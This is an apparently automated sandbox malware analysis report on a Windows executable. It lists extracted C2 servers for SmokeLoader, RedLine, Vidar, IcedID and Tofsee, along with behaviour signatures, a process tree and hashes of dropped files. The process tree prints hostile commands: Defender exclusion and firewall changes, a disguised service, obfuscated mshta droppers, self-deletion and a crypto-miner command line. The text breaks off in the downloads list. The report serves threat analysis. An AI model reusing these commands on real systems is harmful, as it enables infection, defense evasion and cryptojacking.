Analysis

  • max time kernel
    93s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    04-11-2021 04:42

General

  • Target

    ff564daf5fb023e0ced2d6ad63d9864e66dfdc0e5fa64b15a4f50c3b437bda8f.exe

  • Size

    138KB

  • MD5

    7cfbbf6112f52d9d52797ba82b6ef990

  • SHA1

    edbef125f62fe611b9a78bb00d159b4a75fa95f8

  • SHA256

    ff564daf5fb023e0ced2d6ad63d9864e66dfdc0e5fa64b15a4f50c3b437bda8f

  • SHA512

    9fd4f1f0dac5c5478c8fe698c4bbc6650cdcf08b725699560c3e6ec3c9b81a91a1a90357e51886dc30e540326fe67e83420a18d48ffbe9acd958b33ca2891fca

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://honawey70.top/

http://wijibui00.top/

http://nusurtal4f.net/

http://netomishnetojuk.net/

http://escalivrouter.net/

http://nick22doom4.net/

http://wrioshtivsio.su/

http://nusotiso4.su/

http://rickkhtovkka.biz/

http://palisotoliso.net/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

tofsee

C2

quadoil.ru

lakeflex.ru

Extracted

Family

icedid

Campaign

3072349713

C2

rifyyoure.ink

Extracted

Family

redline

Botnet

SuperStar

C2

185.215.113.29:36224

Extracted

Family

redline

Botnet

LOVE

C2

91.242.229.222:21475

Extracted

Family

redline

Botnet

101

C2

185.92.73.142:52097

Extracted

Family

vidar

Version

47.8

Botnet

706

C2

https://mas.to/@romashkin

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

z0rm1on

C2

45.153.186.153:56675

Signatures

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 10 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Core1 .NET packer 1 IoCs

    Detects packer/loader used by .NET malware.

  • Nirsoft 12 IoCs
  • Vidar Stealer 2 IoCs
  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 14 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ff564daf5fb023e0ced2d6ad63d9864e66dfdc0e5fa64b15a4f50c3b437bda8f.exe
    "C:\Users\Admin\AppData\Local\Temp\ff564daf5fb023e0ced2d6ad63d9864e66dfdc0e5fa64b15a4f50c3b437bda8f.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2480
    • C:\Users\Admin\AppData\Local\Temp\ff564daf5fb023e0ced2d6ad63d9864e66dfdc0e5fa64b15a4f50c3b437bda8f.exe
      "C:\Users\Admin\AppData\Local\Temp\ff564daf5fb023e0ced2d6ad63d9864e66dfdc0e5fa64b15a4f50c3b437bda8f.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:3696
  • C:\Users\Admin\AppData\Local\Temp\173D.exe
    C:\Users\Admin\AppData\Local\Temp\173D.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1512
    • C:\Users\Admin\AppData\Local\Temp\173D.exe
      C:\Users\Admin\AppData\Local\Temp\173D.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:3644
  • C:\Users\Admin\AppData\Local\Temp\1AD8.exe
    C:\Users\Admin\AppData\Local\Temp\1AD8.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:3076
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\yuirrbit\
      2⤵
        PID:1484
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\qwrudmmh.exe" C:\Windows\SysWOW64\yuirrbit\
        2⤵
          PID:708
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create yuirrbit binPath= "C:\Windows\SysWOW64\yuirrbit\qwrudmmh.exe /d\"C:\Users\Admin\AppData\Local\Temp\1AD8.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1208
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description yuirrbit "wifi internet conection"
            2⤵
              PID:620
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start yuirrbit
              2⤵
                PID:2344
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:3680
              • C:\Users\Admin\AppData\Local\Temp\1E73.exe
                C:\Users\Admin\AppData\Local\Temp\1E73.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:3840
              • C:\Users\Admin\AppData\Local\Temp\226B.exe
                C:\Users\Admin\AppData\Local\Temp\226B.exe
                1⤵
                • Executes dropped EXE
                PID:576
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 576 -s 272
                  2⤵
                  • Suspicious use of NtCreateProcessExOtherParentProcess
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2996
              • C:\Users\Admin\AppData\Local\Temp\27AC.exe
                C:\Users\Admin\AppData\Local\Temp\27AC.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:3660
                • C:\Users\Admin\AppData\Local\Temp\27AC.exe
                  C:\Users\Admin\AppData\Local\Temp\27AC.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1376
              • C:\Windows\system32\regsvr32.exe
                regsvr32 /s C:\Users\Admin\AppData\Local\Temp\3133.dll
                1⤵
                • Loads dropped DLL
                PID:3192
              • C:\Windows\SysWOW64\yuirrbit\qwrudmmh.exe
                C:\Windows\SysWOW64\yuirrbit\qwrudmmh.exe /d"C:\Users\Admin\AppData\Local\Temp\1AD8.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:3392
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  PID:1752
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3560
              • C:\Users\Admin\AppData\Local\Temp\3366.exe
                C:\Users\Admin\AppData\Local\Temp\3366.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:3720
              • C:\Users\Admin\AppData\Local\Temp\3C41.exe
                C:\Users\Admin\AppData\Local\Temp\3C41.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:1740
              • C:\Users\Admin\AppData\Local\Temp\EEF8.exe
                C:\Users\Admin\AppData\Local\Temp\EEF8.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2704
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im EEF8.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\EEF8.exe" & del C:\ProgramData\*.dll & exit
                  2⤵
                    PID:1060
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im EEF8.exe /f
                      3⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2264
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 6
                      3⤵
                      • Delays execution with timeout.exe
                      PID:932
                • C:\Users\Admin\AppData\Local\Temp\FCC4.exe
                  C:\Users\Admin\AppData\Local\Temp\FCC4.exe
                  1⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3692
                • C:\Users\Admin\AppData\Local\Temp\1157.exe
                  C:\Users\Admin\AppData\Local\Temp\1157.exe
                  1⤵
                  • Executes dropped EXE
                  PID:1900
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\System32\mshta.exe" vBsCRipt: cLosE ( creAteObjEcT ( "wsCrIpT.ShEll" ). RUn ( "C:\Windows\system32\cmd.exe /q /c tyPe ""C:\Users\Admin\AppData\Local\Temp\1157.exe"" > ..\I1UXQU.exe && STarT ..\I1UXqU.EXE -P3PZFXHgL5EFWq~tu7bw97 & If """" == """" for %d iN ( ""C:\Users\Admin\AppData\Local\Temp\1157.exe"" ) do taskkill /f /im ""%~NXd"" " , 0 , tRue ) )
                    2⤵
                      PID:2336
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /q /c tyPe "C:\Users\Admin\AppData\Local\Temp\1157.exe" > ..\I1UXQU.exe && STarT ..\I1UXqU.EXE -P3PZFXHgL5EFWq~tu7bw97 & If "" == "" for %d iN ( "C:\Users\Admin\AppData\Local\Temp\1157.exe" ) do taskkill /f /im "%~NXd"
                        3⤵
                          PID:3928
                          • C:\Users\Admin\AppData\Local\Temp\I1UXQU.exe
                            ..\I1UXqU.EXE -P3PZFXHgL5EFWq~tu7bw97
                            4⤵
                              PID:3120
                              • C:\Windows\SysWOW64\mshta.exe
                                "C:\Windows\System32\mshta.exe" vBsCRipt: cLosE ( creAteObjEcT ( "wsCrIpT.ShEll" ). RUn ( "C:\Windows\system32\cmd.exe /q /c tyPe ""C:\Users\Admin\AppData\Local\Temp\I1UXQU.exe"" > ..\I1UXQU.exe && STarT ..\I1UXqU.EXE -P3PZFXHgL5EFWq~tu7bw97 & If ""-P3PZFXHgL5EFWq~tu7bw97 "" == """" for %d iN ( ""C:\Users\Admin\AppData\Local\Temp\I1UXQU.exe"" ) do taskkill /f /im ""%~NXd"" " , 0 , tRue ) )
                                5⤵
                                  PID:1792
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /q /c tyPe "C:\Users\Admin\AppData\Local\Temp\I1UXQU.exe" > ..\I1UXQU.exe && STarT ..\I1UXqU.EXE -P3PZFXHgL5EFWq~tu7bw97 & If "-P3PZFXHgL5EFWq~tu7bw97 " == "" for %d iN ( "C:\Users\Admin\AppData\Local\Temp\I1UXQU.exe" ) do taskkill /f /im "%~NXd"
                                    6⤵
                                      PID:3672
                                  • C:\Windows\SysWOW64\mshta.exe
                                    "C:\Windows\System32\mshta.exe" vbScriPt: ClosE ( CREaTEoBJeCT ( "WsCRipt.shelL" ). RUN ( "C:\Windows\system32\cmd.exe /c ECHo | SeT /P = ""MZ"" > KXHc.NM & cOPy /y /b KxhC.NM + JN7HGm.~X + r7xx.iO ..\q3lZ0.u2D & sTArT msiexec /Y ..\q3Lz0.U2D & DeL /q * " , 0 , TRUE ) )
                                    5⤵
                                      PID:1252
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /c ECHo | SeT /P = "MZ" > KXHc.NM & cOPy /y /b KxhC.NM + JN7HGm.~X + r7xx.iO ..\q3lZ0.u2D & sTArT msiexec /Y ..\q3Lz0.U2D & DeL /q *
                                        6⤵
                                          PID:3788
                                          • C:\Windows\SysWOW64\msiexec.exe
                                            msiexec /Y ..\q3Lz0.U2D
                                            7⤵
                                              PID:4992
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im "1157.exe"
                                        4⤵
                                        • Kills process with taskkill
                                        PID:2364
                                • C:\Users\Admin\AppData\Local\Temp\1F61.exe
                                  C:\Users\Admin\AppData\Local\Temp\1F61.exe
                                  1⤵
                                  • Executes dropped EXE
                                  PID:2272
                                  • C:\Users\Admin\AppData\Local\Temp\83a6e007-1d77-4683-a259-7a56cf2aef71\AdvancedRun.exe
                                    "C:\Users\Admin\AppData\Local\Temp\83a6e007-1d77-4683-a259-7a56cf2aef71\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\83a6e007-1d77-4683-a259-7a56cf2aef71\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                    2⤵
                                      PID:2968
                                      • C:\Users\Admin\AppData\Local\Temp\83a6e007-1d77-4683-a259-7a56cf2aef71\AdvancedRun.exe
                                        "C:\Users\Admin\AppData\Local\Temp\83a6e007-1d77-4683-a259-7a56cf2aef71\AdvancedRun.exe" /SpecialRun 4101d8 2968
                                        3⤵
                                          PID:3712
                                      • C:\Users\Admin\AppData\Local\Temp\1a869acb-7ce9-407e-abc9-94447bafc8e2\AdvancedRun.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1a869acb-7ce9-407e-abc9-94447bafc8e2\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\1a869acb-7ce9-407e-abc9-94447bafc8e2\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                        2⤵
                                          PID:2396
                                          • C:\Users\Admin\AppData\Local\Temp\1a869acb-7ce9-407e-abc9-94447bafc8e2\AdvancedRun.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1a869acb-7ce9-407e-abc9-94447bafc8e2\AdvancedRun.exe" /SpecialRun 4101d8 2396
                                            3⤵
                                              PID:1288
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1F61.exe" -Force
                                            2⤵
                                              PID:2828
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1F61.exe" -Force
                                              2⤵
                                                PID:2968
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1F61.exe" -Force
                                                2⤵
                                                  PID:1648
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bag.exe" -Force
                                                  2⤵
                                                    PID:2976
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bag.exe" -Force
                                                    2⤵
                                                      PID:2344
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1F61.exe" -Force
                                                      2⤵
                                                        PID:3556
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bag.exe
                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bag.exe"
                                                        2⤵
                                                          PID:3404
                                                          • C:\Users\Admin\AppData\Local\Temp\77831cb2-6bcf-4645-a118-e269af887056\AdvancedRun.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\77831cb2-6bcf-4645-a118-e269af887056\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\77831cb2-6bcf-4645-a118-e269af887056\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                            3⤵
                                                              PID:4876
                                                              • C:\Users\Admin\AppData\Local\Temp\77831cb2-6bcf-4645-a118-e269af887056\AdvancedRun.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\77831cb2-6bcf-4645-a118-e269af887056\AdvancedRun.exe" /SpecialRun 4101d8 4876
                                                                4⤵
                                                                  PID:4044
                                                              • C:\Users\Admin\AppData\Local\Temp\dea5b4e7-253a-4dcc-99b0-e0761ffbe1e7\AdvancedRun.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\dea5b4e7-253a-4dcc-99b0-e0761ffbe1e7\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\dea5b4e7-253a-4dcc-99b0-e0761ffbe1e7\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                3⤵
                                                                  PID:4908
                                                                  • C:\Users\Admin\AppData\Local\Temp\dea5b4e7-253a-4dcc-99b0-e0761ffbe1e7\AdvancedRun.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\dea5b4e7-253a-4dcc-99b0-e0761ffbe1e7\AdvancedRun.exe" /SpecialRun 4101d8 4908
                                                                    4⤵
                                                                      PID:1848
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bag.exe" -Force
                                                                    3⤵
                                                                      PID:916
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bag.exe" -Force
                                                                      3⤵
                                                                        PID:4752
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bag.exe" -Force
                                                                        3⤵
                                                                          PID:4984
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\fox\svchost.exe" -Force
                                                                          3⤵
                                                                            PID:3840
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bag.exe" -Force
                                                                            3⤵
                                                                              PID:4400
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\fox\svchost.exe" -Force
                                                                              3⤵
                                                                                PID:4432
                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                3⤵
                                                                                  PID:4024
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\fox\svchost.exe" -Force
                                                                                2⤵
                                                                                  PID:3184
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1F61.exe" -Force
                                                                                  2⤵
                                                                                    PID:4240
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\fox\svchost.exe" -Force
                                                                                    2⤵
                                                                                      PID:4388
                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                      2⤵
                                                                                        PID:4772
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" ECHo "
                                                                                      1⤵
                                                                                        PID:1196
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>KXHc.NM"
                                                                                        1⤵
                                                                                          PID:1848

                                                                                        Network

                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                        Persistence

                                                                                        New Service

                                                                                        1
                                                                                        T1050

                                                                                        Modify Existing Service

                                                                                        1
                                                                                        T1031

                                                                                        Registry Run Keys / Startup Folder

                                                                                        1
                                                                                        T1060

                                                                                        Privilege Escalation

                                                                                        New Service

                                                                                        1
                                                                                        T1050

                                                                                        Defense Evasion

                                                                                        Disabling Security Tools

                                                                                        1
                                                                                        T1089

                                                                                        Modify Registry

                                                                                        2
                                                                                        T1112

                                                                                        Credential Access

                                                                                        Credentials in Files

                                                                                        3
                                                                                        T1081

                                                                                        Discovery

                                                                                        Query Registry

                                                                                        3
                                                                                        T1012

                                                                                        System Information Discovery

                                                                                        3
                                                                                        T1082

                                                                                        Peripheral Device Discovery

                                                                                        1
                                                                                        T1120

                                                                                        Collection

                                                                                        Data from Local System

                                                                                        3
                                                                                        T1005

                                                                                        Replay Monitor

                                                                                        Loading Replay Monitor...

                                                                                        Downloads

                                                                                        • C:\ProgramData\freebl3.dll
                                                                                          MD5

                                                                                          ef2834ac4ee7d6724f255beaf527e635

                                                                                          SHA1

                                                                                          5be8c1e73a21b49f353c2ecfa4108e43a883cb7b

                                                                                          SHA256

                                                                                          a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba

                                                                                          SHA512

                                                                                          c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2

                                                                                        • C:\ProgramData\mozglue.dll
                                                                                          MD5

                                                                                          8f73c08a9660691143661bf7332c3c27

                                                                                          SHA1

                                                                                          37fa65dd737c50fda710fdbde89e51374d0c204a

                                                                                          SHA256

                                                                                          3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

                                                                                          SHA512

                                                                                          0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

                                                                                        • C:\ProgramData\msvcp140.dll
                                                                                          MD5

                                                                                          109f0f02fd37c84bfc7508d4227d7ed5

                                                                                          SHA1

                                                                                          ef7420141bb15ac334d3964082361a460bfdb975

                                                                                          SHA256

                                                                                          334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

                                                                                          SHA512

                                                                                          46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

                                                                                        • C:\ProgramData\nss3.dll
                                                                                          MD5

                                                                                          bfac4e3c5908856ba17d41edcd455a51

                                                                                          SHA1

                                                                                          8eec7e888767aa9e4cca8ff246eb2aacb9170428

                                                                                          SHA256

                                                                                          e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                                                                                          SHA512

                                                                                          2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                                                                                        • C:\ProgramData\softokn3.dll
                                                                                          MD5

                                                                                          a2ee53de9167bf0d6c019303b7ca84e5

                                                                                          SHA1

                                                                                          2a3c737fa1157e8483815e98b666408a18c0db42

                                                                                          SHA256

                                                                                          43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083

                                                                                          SHA512

                                                                                          45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8

                                                                                        • C:\ProgramData\vcruntime140.dll
                                                                                          MD5

                                                                                          7587bf9cb4147022cd5681b015183046

                                                                                          SHA1

                                                                                          f2106306a8f6f0da5afb7fc765cfa0757ad5a628

                                                                                          SHA256

                                                                                          c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

                                                                                          SHA512

                                                                                          0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                          MD5

                                                                                          4ca4d2786722eaefa05796452ea63603

                                                                                          SHA1

                                                                                          574a2c2dba3ee469926fb17c4dd1e513ed0a1284

                                                                                          SHA256

                                                                                          675336cde5bdc96e05a5b091bbbdf095caf4b582ec3f250939bb4df14886fcb3

                                                                                          SHA512

                                                                                          970e22f4577ef032442464908646059480f396351719e4c42b5f7e6ca68e1a525640f3b51211a998d13f58f747ab41879bd59e452e5e39d327dc8b01ba8a7b88

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                          MD5

                                                                                          101343244d619fd29dc007b34351865b

                                                                                          SHA1

                                                                                          a721bf0ee99f24b3e6c263033cfa02a63d4175cc

                                                                                          SHA256

                                                                                          286038573287d04ce980461054d2377b71ab4eb8a37e466b38d120ad7f93a043

                                                                                          SHA512

                                                                                          1a40055b9e2186d142059ab12afc82a21767f9fbfe98345be40f67619d128fb261f6afef74b25ba52b8f80480bb86e06006047de1b9505d5a65f7d7ee3ce0209

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                          MD5

                                                                                          101343244d619fd29dc007b34351865b

                                                                                          SHA1

                                                                                          a721bf0ee99f24b3e6c263033cfa02a63d4175cc

                                                                                          SHA256

                                                                                          286038573287d04ce980461054d2377b71ab4eb8a37e466b38d120ad7f93a043

                                                                                          SHA512

                                                                                          1a40055b9e2186d142059ab12afc82a21767f9fbfe98345be40f67619d128fb261f6afef74b25ba52b8f80480bb86e06006047de1b9505d5a65f7d7ee3ce0209

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                          MD5

                                                                                          d1c97d5904c8e775d48fd3879e176e28

                                                                                          SHA1

                                                                                          20ddcf98b5afaa135d6cafa942a0c3c70daa5a2f

                                                                                          SHA256

                                                                                          384cff786805d7c1e1ff3dd930b4240b1e03fcaff63842f5869172d9b07ee8e4

                                                                                          SHA512

                                                                                          49be22cda4521c5ad8a31fb38e791dfff0dc2987be2074cc87356c1af64d5438ba0ede1e50226948af29e3deec37cc1e9869d586c8d8e24fe6c73231068669cf

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                          MD5

                                                                                          2b850e86e4e76d2227555b2a594ab8e6

                                                                                          SHA1

                                                                                          8e40f82d99c393036b98426c2c43d4c6f692e87b

                                                                                          SHA256

